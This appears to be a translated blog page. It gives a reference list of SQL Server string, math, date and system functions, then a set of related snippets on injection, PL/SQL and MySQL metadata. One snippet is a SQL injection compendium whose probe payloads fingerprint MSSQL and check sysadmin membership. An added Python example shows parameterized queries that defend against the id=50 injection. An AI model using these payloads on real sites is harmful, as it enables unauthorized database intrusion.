SQL Server Basic Functions
1. String functions
Length and parsing
datalength(Char_expr) returns the number of characters in the string, not counting trailing spaces
substring(expression,start,length) extracts a substring
right(char_expr,int_expr) returns the rightmost int_expr characters of the string
Character manipulation
upper(char_expr) converts to uppercase
lower(char_expr) converts to lowercase
space(int_expr) generates int_expr spaces
replicate(char_expr,int_expr) repeats the string int_expr times
reverse(char_expr) reverses the string
stuff(char_expr1,start,length,char_expr2) replaces the length characters of char_expr1 starting at start with char_expr2
ltrim(char_expr) rtrim(char_expr) strip spaces
ascii(char) char(ascii) a matching pair: get the ASCII code of a character, get the character for an ASCII code
String searching
charindex(char_expr,expression) returns the starting position of char_expr
patindex("%pattern%",expression) returns the starting position of the specified pattern, or 0 if it is not found
2. Math functions
abs(numeric_expr) absolute value
ceiling(numeric_expr) smallest integer greater than or equal to the given value
exp(float_expr) exponential
floor(numeric_expr) largest integer less than or equal to the given value
pi() 3.1415926.........
power(numeric_expr,power) raises the value to the given power
rand([int_expr]) random number generator
round(numeric_expr,int_expr) rounds to the precision given by int_expr
sign(int_expr) returns +1, 0 or -1 for a positive number, zero or a negative number
sqrt(float_expr) square root
3. Date functions
getdate() returns the current date
datename(datepart,date_expr) returns the name, e.g. June
datepart(datepart,date_expr) extracts one part of a date
datediff(datepart,date_expr1,date_expr2) difference between two dates
dateadd(datepart,number,date_expr) returns the date plus number
Values of datepart in the functions above:
Abbreviation Range Meaning
yy 1753-9999 year
qq 1-4 quarter
mm 1-12 month
dy 1-366 day
dd 1-31 day
wk 1-54 week
dw 1-7 day of the week
hh 0-23 hour
mi 0-59 minute
ss 0-59 second
ms 0-999 millisecond
Date conversion
convert()
4. System functions
suser_name() the user's login name
user_name() the user's name in the database
user the user's name in the database
show_role() the rules in effect for the current user
db_name() database name
object_name(obj_id) database object name
col_name(obj_id,col_id) column name
col_length(objname,colname) column length
valid_name(char_expr) whether the string is a valid identifier
Related documents:
and exists (select * from sysobjects) //checks whether the database is MSSQL
and exists(select * from tableName) //checks whether a table exists; tableName is the table name
and 1=(select @@VERSION) //MSSQL version
And 1=(select db_name()) //current database name
and 1=(select @@servername) //local server name
and 1=(select IS_SRVROLEMEMBER('sysadmin')) // ......
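SQL Manual Injection Compendium
Friday, 11 August 2006, 21:00
For example, when querying the record whose id is 50, if the parameter the user passes in is 50 and 1=1 and no filtering has been set up, the query returns the result directly. SQL injection is encountered most often in ASP programs.
See the following:
1. Determine whether injection is possible
;and 1=1
;and 1=2
2. Preliminary check of whether the database is MSSQL
;and user>0
3. Determine the database system
;and ......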
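
The id=50 case described above, as an added example that is not part of the original article: the same lookup built by string concatenation and with a bound parameter, plus a regression check that uses the article's 1=1 / 1=2 pair to confirm input is handled as data. In-memory SQLite stands in for the SQL Server backend, and the articles table, its rows and all function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the real backend (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [(49, "previous"), (50, "target"), (51, "next")])
    return db

def lookup_concatenated(db, raw_id):
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # so "50 and 1=2" is parsed as an extra predicate.
    sql = "SELECT title FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_parameterized(db, raw_id):
    # Hardened pattern: enforce the expected type, then bind the value.
    # A bound value is only compared as data and is never parsed as SQL.
    try:
        article_id = int(raw_id)
    except ValueError:
        return None  # reject; the caller should answer with an error and log it
    sql = "SELECT title FROM articles WHERE id = ?"
    return db.execute(sql, (article_id,)).fetchall()

def behaves_injectable(lookup, db):
    # Regression check: appending a true or a false condition to the id must
    # not steer the result. If 1=1 matches the baseline while 1=2 does not,
    # the parameter is being interpreted as SQL.
    baseline = lookup(db, "50")
    true_case = lookup(db, "50 and 1=1")
    false_case = lookup(db, "50 and 1=2")
    return true_case == baseline and false_case != baseline

if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concatenated, lookup_parameterized):
        print(fn.__name__, "injectable:", behaves_injectable(fn, db))
```
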
PL/SQL has no input/output capability of its own,
but it can rely on the environment to pass values into and out of a PL/SQL block.
The SQLPLUS environment uses substitution variables and host (bind) variables to pass values into a PL/SQL block.
substitution variable: marked by a preceding ampersand, such as &a
host (bind) variable: marked by a preceding colon, such as :x
Substitute ......
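Checking the patch level of SQL Server is not as direct as checking the patch level of Windows. A system administrator who does not know which patch number corresponds to which SQL Server version may run into some trouble, so it is explained here. Identifying the machine in this way is a safe method and has no effect on the system.

1. Log in to SQL Server with Isql or SQL Query Analyzer. If you use Isql, type isql -U sa in a cmd window, then ......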
Today I found the statements for retrieving MySQL table and column comments.
Get column comments
SELECT COLUMN_NAME 列名, DATA_TYPE 字段类型, COLUMN_COMMENT 字段注释
from INFORMATION_SCHEMA.COLUMNS
WHERE table_name = 'companies' ## table name
AND table_schema = 'testhuicard' ## database name
AND column_name LIKE 'c_name' ## column name
--------------------------- ......